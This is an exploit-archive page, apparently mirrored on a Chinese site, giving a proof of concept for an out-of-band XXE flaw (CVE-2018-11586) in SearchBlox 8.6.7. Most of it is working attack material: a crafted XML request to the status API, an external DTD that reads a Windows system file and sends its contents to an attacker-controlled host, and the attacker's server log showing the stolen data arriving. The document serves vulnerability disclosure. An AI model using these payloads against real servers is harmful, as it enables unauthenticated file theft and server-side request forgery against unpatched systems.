扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 |
# Exploit Title: SearchBlox 8.6.7 Out-Of-Band XML eXternal Entity (OOB-XXE) # Exploit Author: Ahmet GUREL, Canberk BOLAT # Software Link: https://www.searchblox.com/ # Version: < = SearchBlox Version 8.6.7 # Platform: Java # Tested on: Windows # CVE: CVE-2018-11586 # 1. DETAILS An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts. Reference: https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing # 2. PoC: XML external entity (XXE) vulnerability in /searchblox/api/rest/status in SearchBlox 8.6.7 allows remote unauthenticated users to read arbitrary files or conduct server-side request forgery (SSRF) attacks via a crafted DTD in an XML request. HTTP Request: _____________ GET /searchblox/api/rest/status HTTP/1.1 Host: localhost:8080 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Cookie: JSESSIONID=n9uolja8nwkj15nsv66xjlzci; XSRF-TOKEN=6098a021-0e3c-409f-9da0-b895eff3025d; AdsOnPage=5; AdsOnSearchPage=5 Connection: close Upgrade-Insecure-Requests: 1 Content-Length: 140 <?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE xxe [ <!ENTITY % dtd SYSTEM "http://192.168.1.2:7000/ext.dtd"> %dtd; %all; %send;]> #Ext.dtd File : _______________ <?xml version="1.0" encoding="UTF-8"?> <!ENTITY % file SYSTEM "file:///C:/windows/win.ini"> <!ENTITY % all "<!ENTITY % send SYSTEM 'http://192.168.1.2:7000/?%file; '>"> %all; #HTTP Response: _______________ Ahmets-MacBook-Pro:Desktop ahmet$ python -m SimpleHTTPServer 7000 Serving HTTP on 0.0.0.0 port 7000 ... 192.168.1.2 - - [03/Jun/2018 15:37:16] "GET /ext.dtd HTTP/1.1" 200 - 192.168.1.2 - - [03/Jun/2018 15:37:16] "GET /?;%20for%2016-bit%20app%20support%20[fonts]%20[extensions]%20[mci%20extensions]%20[files]%20[Mail]%20MAPI=1 HTTP/1.1" 200 - |
体验盒子
